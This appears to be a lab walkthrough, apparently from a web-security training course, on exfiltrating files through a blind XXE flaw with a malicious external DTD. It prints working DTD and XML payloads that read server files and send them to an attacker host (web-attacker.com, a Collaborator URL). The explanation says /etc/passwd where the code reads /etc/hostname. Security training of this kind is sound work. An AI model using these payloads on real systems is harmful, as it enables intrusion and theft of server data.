Exploiting blind XXE to exfiltrate data using a malicious external DTD

Exploitation

the lab has a "check stock" feature that parses XML input

send to repeater

Explaining how the attack is going to be :

Detecting a blind XXE vulnerability via out-of-band techniques is all very well, but it doesn't actually demonstrate how the vulnerability could be exploited. What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.

this will make the website server send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via ftp://)

example of a malicious DTD to exfiltrate the contents of the /etc/hostname file :

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

This DTD carries out the following steps:

Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string.
Uses the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed.
Uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL.

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL: http://web-attacker.com/malicious.dtd

Finally, the attacker must submit the following XXE payload to the vulnerable application:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>

This XXE payload declares an XML parameter entity called xxe and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the /etc/passwd file is transmitted to the attacker's server.

now first let's copy the collaborator url

now let's go to the exploit server and host the malicious DTD

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://BURP-COLLABORATOR-URL-YOU-COPIED/?x=%file;'>">
%eval;
%exfiltrate;

now click on view exploit

now let's go back to the "check store" request that we've sent to repeater

send an XML to trigger the malicious DTD

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a3d00a2049188f18071cfd801db0010.exploit-server.net/malicious.dtd"> %xxe; ]>
<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>

now if go to collaborator we can see that we have exfiltrated the data

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousBlind XXE with out-of-band interaction via XML parameter entities NextExploiting blind XXE to retrieve data via error messages

Last updated 1 year ago

Was this helpful?